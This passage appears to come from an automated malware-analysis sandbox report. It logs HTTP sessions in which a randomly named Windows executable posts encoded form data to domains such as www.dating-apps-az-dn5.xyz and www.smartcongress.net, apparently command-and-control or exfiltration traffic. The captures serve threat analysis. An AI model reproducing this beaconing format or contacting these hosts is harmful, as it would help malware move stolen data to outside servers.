70 48 75 49 51 70 74 65 55 4a 6c 4a 71 58 65 46 49 68 33 46 59 62 34 39 43 39 2b 69 74 6f 6f 57 4e 34 37 6c 37 37 64 33 34 33 56 30 53 79 7a 6d 31 51 47 6e 66 71 6f 50 52 58 48 73 49 37 46 79 44 2b 51 49 74 49 73 48 4d 4b 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_OOCfvkkgyNxpHuIQpteUJlJqXeFIh3FYb49C9+itooWN47l77d343V0Syzm1QGnfqoPRXHsI7FyD+QItIsHMKA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 10, 2025 19:56:33.609183073 CET	607	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOTJmMTg1ZjAtODgwZC00NjY5LWFmYjEtNmM3YzczZGVhMGIwIiwicGFnZV90aW1lIjoxNzM2NTM1Mz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49805	199.59.243.228	80	5868	C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:56:35.718694925 CET	755	OUT	POST /oh72/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.dating-apps-az-dn5.xyz Origin: http://www.dating-apps-az-dn5.xyz Content-Length: 228 Connection: close Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Referer: http://www.dating-apps-az-dn5.xyz/oh72/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 51 7a 6d 4c 78 6e 38 3d 43 67 5a 4e 31 42 7a 72 6d 6a 54 51 53 67 78 59 4c 44 6f 65 49 71 34 6a 52 72 58 56 70 79 56 4f 35 7a 33 63 58 4c 48 4c 62 78 78 4b 4d 4c 5a 48 56 48 58 61 45 67 63 63 4c 73 57 7a 35 37 69 49 69 4d 66 46 4c 45 43 36 46 49 54 4b 2b 6e 56 4a 44 79 35 47 78 38 4f 52 5a 78 66 46 6d 54 67 37 61 34 5a 55 67 47 72 6e 32 75 61 41 2f 51 56 6e 44 35 7a 61 69 79 77 51 5a 55 43 4c 62 45 4e 32 52 67 6e 6c 68 48 4c 6b 61 61 34 4a 75 43 52 69 51 6e 6f 78 2b 59 68 79 4a 66 39 46 62 34 50 30 42 4b 67 53 39 74 67 56 57 44 2f 63 74 6c 6c 44 51 61 44 65 43 4c 7a 73 64 48 55 74 4f 38 4a 66 44 41 53 33 52 59 30 75 6a 57 4a 73 57 30 6a 4b 73 4c 66 47 58 36 6c 38 71 6d 78 31 Data Ascii: QzmLxn8=CgZN1BzrmjTQSgxYLDoeIq4jRrXVpyVO5z3cXLHLbxxKMLZHVHXaEgccLsWz57iIiMfFLEC6FITK+nVJDy5Gx8ORZxfFmTg7a4ZUgGrn2uaA/QVnD5zaiywQZUCLbEN2RgnlhHLkaa4JuCRiQnox+YhyJf9Fb4P0BKgS9tgVWD/ctllDQaDeCLzsdHUtO8JfDAS3RY0ujWJsW0jKsLfGX6l8qmx1
Jan 10, 2025 19:56:36.194423914 CET	1236	IN	HTTP/1.1 200 OK date: Fri, 10 Jan 2025 18:56:35 GMT content-type: text/html; charset=utf-8 content-length: 1154 x-request-id: aefbf417-e98f-4166-9746-1ce1423953bc cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_OOCfvkkgyNxpHuIQpteUJlJqXeFIh3FYb49C9+itooWN47l77d343V0Syzm1QGnfqoPRXHsI7FyD+QItIsHMKA== set-cookie: parking_session=aefbf417-e98f-4166-9746-1ce1423953bc; expires=Fri, 10 Jan 2025 19:11:36 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4f 4f 43 66 76 6b 6b 67 79 4e 78 70 48 75 49 51 70 74 65 55 4a 6c 4a 71 58 65 46 49 68 33 46 59 62 34 39 43 39 2b 69 74 6f 6f 57 4e 34 37 6c 37 37 64 33 34 33 56 30 53 79 7a 6d 31 51 47 6e 66 71 6f 50 52 58 48 73 49 37 46 79 44 2b 51 49 74 49 73 48 4d 4b 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_OOCfvkkgyNxpHuIQpteUJlJqXeFIh3FYb49C9+itooWN47l77d343V0Syzm1QGnfqoPRXHsI7FyD+QItIsHMKA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 10, 2025 19:56:36.194439888 CET	607	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYWVmYmY0MTctZTk4Zi00MTY2LTk3NDYtMWNlMTQyMzk1M2JjIiwicGFnZV90aW1lIjoxNzM2NTM1Mz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49824	199.59.243.228	80	5868	C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:56:38.265829086 CET	1772	OUT	POST /oh72/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.dating-apps-az-dn5.xyz Origin: http://www.dating-apps-az-dn5.xyz Content-Length: 1244 Connection: close Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Referer: http://www.dating-apps-az-dn5.xyz/oh72/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 51 7a 6d 4c 78 6e 38 3d 43 67 5a 4e 31 42 7a 72 6d 6a 54 51 53 67 78 59 4c 44 6f 65 49 71 34 6a 52 72 58 56 70 79 56 4f 35 7a 33 63 58 4c 48 4c 62 79 52 4b 50 35 68 48 57 6b 2f 61 48 67 63 63 49 73 57 49 35 37 69 76 69 4d 48 42 4c 45 4f 41 46 4b 62 4b 73 30 4e 4a 46 44 35 47 36 38 4f 52 46 42 66 45 35 44 68 35 61 38 39 51 67 48 62 6e 32 75 61 41 2f 57 78 6e 45 73 48 61 67 79 77 50 65 55 43 39 4d 30 4d 66 52 67 2f 54 68 48 2f 30 61 73 49 4a 74 69 42 69 41 45 41 78 33 59 68 30 49 66 39 64 62 34 53 71 42 4b 74 70 39 74 56 2b 57 42 2f 63 75 77 41 59 4e 75 57 47 61 70 62 4e 46 47 45 38 48 62 68 4a 48 7a 36 34 56 5a 4d 65 6c 52 31 48 51 6c 66 65 74 34 53 71 54 38 78 34 39 54 63 63 64 59 6c 41 45 70 35 64 45 56 6f 4b 75 6b 4f 74 7a 53 70 64 78 41 75 33 62 41 61 52 2b 6e 6f 78 4a 62 4e 73 49 2f 4c 47 46 63 73 49 72 53 4f 53 4e 32 78 51 5a 50 53 64 76 67 51 37 33 56 42 76 33 56 30 59 55 63 36 37 62 35 49 72 4f 2f 4c 75 75 7a 38 50 62 6a 7a 49 52 69 45 77 44 33 38 7a 4d 72 54 54 70 75 6a 32 52 6c 38 55 62 6b [TRUNCATED] Data Ascii: QzmLxn8=CgZN1BzrmjTQSgxYLDoeIq4jRrXVpyVO5z3cXLHLbyRKP5hHWk/aHgccIsWI57iviMHBLEOAFKbKs0NJFD5G68ORFBfE5Dh5a89QgHbn2uaA/WxnEsHagywPeUC9M0MfRg/ThH/0asIJtiBiAEAx3Yh0If9db4SqBKtp9tV+WB/cuwAYNuWGapbNFGE8HbhJHz64VZMelR1HQlfet4SqT8x49TccdYlAEp5dEVoKukOtzSpdxAu3bAaR+noxJbNsI/LGFcsIrSOSN2xQZPSdvgQ73VBv3V0YUc67b5IrO/Luuz8PbjzIRiEwD38zMrTTpuj2Rl8Ubkyjg6K7aoFu2jaRC/Ky4Xb953EWUDofny1qPtKi5xr6Zm8Atcyqim58+W82ibDuq8vA2IzDGbd4zhfW/pNH1FOd/2/p3h/mt+bNTXLdkGM7IDjx97nsg/xk5m4VLGMRvjNCUDHPTZvM9OXQuMijGPV1TQCfJFniFCAkkDS3GtCbYWLEhmmbi/zzBj/Riqic5OPR7miSjqN20fPB5H2Ud0K5A5yCmTEBew5/IypSsId+vJwF/UoBs0ES15a608WKFD1iI0QkK6zSbR9I/XN689ErXYmnxBhdZgkglYuovf4sV2JPCuBk8Cm9BUlPW9NbXqT5PMlRhsvd4XACezwMw2wlYr/7JOFvsnv2mvB/ZR+lCG6mPEVrfEFD6PcOJ5QaDKqHjXtkXwPL5qHvDPS9by35rs/YB0EDZ4Y7JtAQ2i2zNJccWzCAYpcb6tM8YOHTZ9oy6zueu1Esx6E6DawJjrCmn92ZtoHl7sNNITd23LaD1BknLd8lQoBzF3mV7ERh5kH1IErhjQx48B6EWC8LUGMqXgwKjswa3ogspV3CuJ1/514diRYGCdK862u9RJTtZNsDsIWoDGkUiIBxOgcAOz1NjNga0HxM5GAWl6ktI82Ke/aRmccx9NvxtcZjwniKeSF59c+83jCFupsOaoIwQ+e2yuQapepnUJX4 [TRUNCATED]
Jan 10, 2025 19:56:38.721745014 CET	1236	IN	HTTP/1.1 200 OK date: Fri, 10 Jan 2025 18:56:37 GMT content-type: text/html; charset=utf-8 content-length: 1154 x-request-id: 1f03bf9d-4f2d-4233-81a6-9616602e6a17 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_OOCfvkkgyNxpHuIQpteUJlJqXeFIh3FYb49C9+itooWN47l77d343V0Syzm1QGnfqoPRXHsI7FyD+QItIsHMKA== set-cookie: parking_session=1f03bf9d-4f2d-4233-81a6-9616602e6a17; expires=Fri, 10 Jan 2025 19:11:38 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4f 4f 43 66 76 6b 6b 67 79 4e 78 70 48 75 49 51 70 74 65 55 4a 6c 4a 71 58 65 46 49 68 33 46 59 62 34 39 43 39 2b 69 74 6f 6f 57 4e 34 37 6c 37 37 64 33 34 33 56 30 53 79 7a 6d 31 51 47 6e 66 71 6f 50 52 58 48 73 49 37 46 79 44 2b 51 49 74 49 73 48 4d 4b 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_OOCfvkkgyNxpHuIQpteUJlJqXeFIh3FYb49C9+itooWN47l77d343V0Syzm1QGnfqoPRXHsI7FyD+QItIsHMKA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 10, 2025 19:56:38.721767902 CET	607	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMWYwM2JmOWQtNGYyZC00MjMzLTgxYTYtOTYxNjYwMmU2YTE3IiwicGFnZV90aW1lIjoxNzM2NTM1Mz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	49839	199.59.243.228	80	5868	C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:56:40.811235905 CET	453	OUT	GET /oh72/?QzmLxn8=Pixt23+2viDWZBpPGhxHDIEpTcfi8hBLzC3+bNT5RB5HeZd9Pm7rRQlaKMOo7b7Bt+DYNUDGaqLOm1hEaT1x/4L/TlLnmEFiYoRiqhXP6+Cd0hZ8IbffkhN4Yh60b3gTSw==&nbd8Y=hfD0 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.dating-apps-az-dn5.xyz Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Jan 10, 2025 19:56:41.276339054 CET	1236	IN	HTTP/1.1 200 OK date: Fri, 10 Jan 2025 18:56:40 GMT content-type: text/html; charset=utf-8 content-length: 1514 x-request-id: e2445280-f6b2-4b7c-9967-930c2befec98 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_mYqfwQZhNvo75VE2cq0Pr9pGBYl6jjjBQik9ru1fWmm30W3UYzvxAxvpDZydCqBBkLa4taRGjK4f4yWXDlmunQ== set-cookie: parking_session=e2445280-f6b2-4b7c-9967-930c2befec98; expires=Fri, 10 Jan 2025 19:11:41 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6d 59 71 66 77 51 5a 68 4e 76 6f 37 35 56 45 32 63 71 30 50 72 39 70 47 42 59 6c 36 6a 6a 6a 42 51 69 6b 39 72 75 31 66 57 6d 6d 33 30 57 33 55 59 7a 76 78 41 78 76 70 44 5a 79 64 43 71 42 42 6b 4c 61 34 74 61 52 47 6a 4b 34 66 34 79 57 58 44 6c 6d 75 6e 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_mYqfwQZhNvo75VE2cq0Pr9pGBYl6jjjBQik9ru1fWmm30W3UYzvxAxvpDZydCqBBkLa4taRGjK4f4yWXDlmunQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 10, 2025 19:56:41.276359081 CET	967	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZTI0NDUyODAtZjZiMi00YjdjLTk5NjctOTMwYzJiZWZlYzk4IiwicGFnZV90aW1lIjoxNzM2NTM1ND

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.8	49874	146.88.233.115	80	5868	C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:56:46.562665939 CET	720	OUT	POST /rwyw/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.smartcongress.net Origin: http://www.smartcongress.net Content-Length: 208 Connection: close Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Referer: http://www.smartcongress.net/rwyw/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 51 7a 6d 4c 78 6e 38 3d 67 57 70 71 57 64 79 35 42 43 44 6a 42 6c 4a 51 48 64 61 79 72 67 4b 53 2b 6c 33 52 46 4b 4b 69 55 55 4d 4f 38 73 63 70 30 4e 5a 46 68 47 51 5a 66 42 63 4a 6f 4f 51 6d 54 72 4a 48 74 44 68 45 66 59 6f 4d 31 78 74 38 53 6d 32 6c 74 38 52 34 39 2f 64 54 6a 6a 37 62 32 44 46 52 4a 46 47 55 5a 71 54 75 2f 75 59 54 62 64 43 47 76 53 44 53 6c 55 39 7a 6a 76 50 45 30 41 41 78 75 66 72 48 76 43 65 54 76 54 42 53 32 4b 58 33 45 48 30 4e 56 54 78 57 47 69 33 44 67 64 30 4b 75 67 4a 65 45 4a 50 44 2b 76 56 4f 47 6c 49 72 64 68 54 49 56 66 52 79 63 67 72 4e 41 58 47 61 6d 67 55 67 52 76 4c 68 72 70 67 3d Data Ascii: QzmLxn8=gWpqWdy5BCDjBlJQHdayrgKS+l3RFKKiUUMO8scp0NZFhGQZfBcJoOQmTrJHtDhEfYoM1xt8Sm2lt8R49/dTjj7b2DFRJFGUZqTu/uYTbdCGvSDSlU9zjvPE0AAxufrHvCeTvTBS2KX3EH0NVTxWGi3Dgd0KugJeEJPD+vVOGlIrdhTIVfRycgrNAXGamgUgRvLhrpg=
Jan 10, 2025 19:56:47.422580957 CET	380	IN	HTTP/1.1 404 Not Found content-type: text/html; charset=iso-8859-1 content-length: 196 date: Fri, 10 Jan 2025 18:56:47 GMT server: LiteSpeed x-tuned-by: N0C connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.8	49889	146.88.233.115	80	5868	C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:56:49.110348940 CET	740	OUT	POST /rwyw/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.smartcongress.net Origin: http://www.smartcongress.net Content-Length: 228 Connection: close Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Referer: http://www.smartcongress.net/rwyw/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 51 7a 6d 4c 78 6e 38 3d 67 57 70 71 57 64 79 35 42 43 44 6a 41 45 35 51 47 36 32 79 73 41 4b 52 67 56 33 52 4c 71 4b 75 55 55 41 4f 38 70 6b 35 30 35 31 46 68 6b 59 5a 65 41 63 4a 34 65 51 6d 63 4c 49 4e 75 7a 68 61 66 59 6c 37 31 77 52 38 53 6d 79 6c 74 35 74 34 39 49 70 55 78 6a 37 56 74 7a 46 70 4e 46 47 55 5a 71 54 75 2f 75 4d 35 62 64 61 47 75 69 54 53 33 67 52 77 39 2f 50 46 6b 77 41 78 71 66 72 62 76 43 66 70 76 52 6b 50 32 4d 54 33 45 46 73 4e 56 42 4a 56 52 79 33 4a 2f 4e 31 57 6c 77 67 77 4f 66 6a 37 69 4e 56 51 48 6c 4e 4b 59 58 69 69 50 39 5a 30 66 67 44 6d 41 55 75 73 6a 58 4a 49 4c 4d 62 52 31 2b 31 7a 6a 31 30 44 43 63 66 6b 65 69 51 72 39 53 58 33 72 6d 41 67 Data Ascii: QzmLxn8=gWpqWdy5BCDjAE5QG62ysAKRgV3RLqKuUUAO8pk5051FhkYZeAcJ4eQmcLINuzhafYl71wR8Smylt5t49IpUxj7VtzFpNFGUZqTu/uM5bdaGuiTS3gRw9/PFkwAxqfrbvCfpvRkP2MT3EFsNVBJVRy3J/N1WlwgwOfj7iNVQHlNKYXiiP9Z0fgDmAUusjXJILMbR1+1zj10DCcfkeiQr9SX3rmAg
Jan 10, 2025 19:56:49.756146908 CET	380	IN	HTTP/1.1 404 Not Found content-type: text/html; charset=iso-8859-1 content-length: 196 date: Fri, 10 Jan 2025 18:56:49 GMT server: LiteSpeed x-tuned-by: N0C connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this 